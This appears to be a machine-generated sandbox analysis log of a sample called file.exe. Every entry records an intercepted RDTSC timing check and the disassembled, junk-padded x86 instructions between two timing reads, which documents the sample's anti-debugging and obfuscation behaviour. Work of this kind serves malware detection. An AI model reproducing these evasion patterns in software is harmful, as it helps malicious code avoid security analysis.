                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AAA second address: E93AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AAE second address: E93AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AB4 second address: E93ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93D54 second address: E93D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93D5A second address: E93D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FBBA8502ABCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93FF8 second address: E93FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94547 second address: E9459A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FBBA8502AB8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a movzx esi, si 0x0000002d xchg eax, ebx 0x0000002e push eax 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 ja 00007FBBA8502AB6h 0x00000038 popad 0x00000039 pop eax 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jg 00007FBBA8502AB6h 0x00000044 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97522 second address: E9752B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9752B second address: E975C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBBA8502ABCh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FBBA8502AB8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FBBA8502AB8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jmp 00007FBBA8502AC8h 0x0000004f movsx edi, bx 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122DB3F1h], edx 0x0000005a or si, 0710h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FBBA8502AC8h 0x00000067 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E975C9 second address: E975CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9801A second address: E9801F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E99FB2 second address: E99FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F08D second address: E9F096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F096 second address: E9F0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F0A8 second address: E9F0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F268 second address: E9F277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED29Bh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F277 second address: E9F27B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA13DC second address: EA13E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA244C second address: EA2450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA2450 second address: EA2456 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA2456 second address: EA245C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA1688 second address: EA168E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA245C second address: EA2460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3440 second address: EA3445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3445 second address: EA3456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FBBA8502AB6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3456 second address: EA3468 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FBBA93ED29Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA2776 second address: EA2793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBBA8502AC4h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3468 second address: EA349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBBA93ED29Eh 0x0000000b push 00000000h 0x0000000d and di, 5229h 0x00000012 sub dword ptr [ebp+122D1B5Fh], ecx 0x00000018 push 00000000h 0x0000001a mov edi, ebx 0x0000001c xchg eax, esi 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4295 second address: EA4299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4299 second address: EA42B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA36C4 second address: EA36C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA42B3 second address: EA42C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA42C7 second address: EA42E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBA8502AC1h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4512 second address: EA451D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBBA93ED296h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA451D second address: EA4523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA61D9 second address: EA61DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4523 second address: EA4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA61DD second address: EA61E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4527 second address: EA4539 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA61E1 second address: EA6214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 pushad 0x00000009 xor ch, FFFFFFC3h 0x0000000c mov ch, 3Fh 0x0000000e popad 0x0000000f push 00000000h 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 xchg eax, esi 0x00000015 push ecx 0x00000016 push esi 0x00000017 jmp 00007FBBA93ED29Fh 0x0000001c pop esi 0x0000001d pop ecx 0x0000001e push eax 0x0000001f jns 00007FBBA93ED2B6h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4539 second address: EA45AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 add edi, 5C52D702h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 xor dword ptr [ebp+122D2747h], ebx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 cld 0x00000023 mov eax, dword ptr [ebp+122D0079h] 0x00000029 stc 0x0000002a jmp 00007FBBA8502ABFh 0x0000002f push FFFFFFFFh 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FBBA8502AB8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b nop 0x0000004c push ecx 0x0000004d ja 00007FBBA8502ABCh 0x00000053 pop ecx 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA638A second address: EA63AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jne 00007FBBA93ED296h 0x00000013 pop esi 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA825C second address: EA8262 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4ED15 second address: E4ED2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 jns 00007FBBA93ED296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABBB9 second address: EABBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBBA8502AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABBC7 second address: EABBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACBD9 second address: EACBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADC8C second address: EADCA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBBA93ED29Ah 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADCA2 second address: EADCA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADCA8 second address: EADD28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBBA93ED298h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, ecx 0x00000026 sbb ebx, 28F27F0Eh 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D36B0h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FBBA93ED298h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 js 00007FBBA93ED29Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8507 second address: EA850B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABD6A second address: EABD70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADD28 second address: EADD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA850B second address: EA8511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABD70 second address: EABD87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FBBA8502AC2h 0x0000000f js 00007FBBA8502ABCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8511 second address: EA8532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FBBA93ED296h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8532 second address: EA8538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAEC08 second address: EAEC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAEC0E second address: EAEC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDC0 second address: EAFDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDC5 second address: EAFDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDD0 second address: EAFE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2F0Ch], eax 0x00000010 mov dword ptr [ebp+122D313Bh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr [ebp+122D24FCh], eax 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FBBA93ED298h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 jmp 00007FBBA93ED29Ch 0x00000049 mov eax, dword ptr [ebp+122D00A5h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007FBBA93ED298h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 jne 00007FBBA93ED29Ch 0x0000006f push FFFFFFFFh 0x00000071 clc 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFE61 second address: EAFE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58D31 second address: E58D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7EF2 second address: EB7F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FBBA8502ABCh 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F13 second address: EB7F48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBBA93ED29Bh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jne 00007FBBA93ED29Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBBA93ED2A4h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F48 second address: EB7F60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC0h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F60 second address: EB7F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F64 second address: EB7F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F7E second address: EB7FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBBA93ED2A8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7FA8 second address: EB7FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF053 second address: EBF057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF057 second address: EBF05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF05D second address: EBF070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED29Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF0F6 second address: EBF114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF114 second address: EBF119 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF119 second address: EBF142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c ja 00007FBBA8502ABCh 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBBA8502ABBh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF142 second address: EBF146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF146 second address: EBF14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC56A1 second address: EC56AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jno 00007FBBA93ED296h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57FF second address: EC5808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5808 second address: EC580E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC580E second address: EC5815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5815 second address: EC5837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBBA93ED296h 0x0000000a jmp 00007FBBA93ED2A8h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC59B1 second address: EC59C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FBBA8502AB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B7B second address: EC5B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
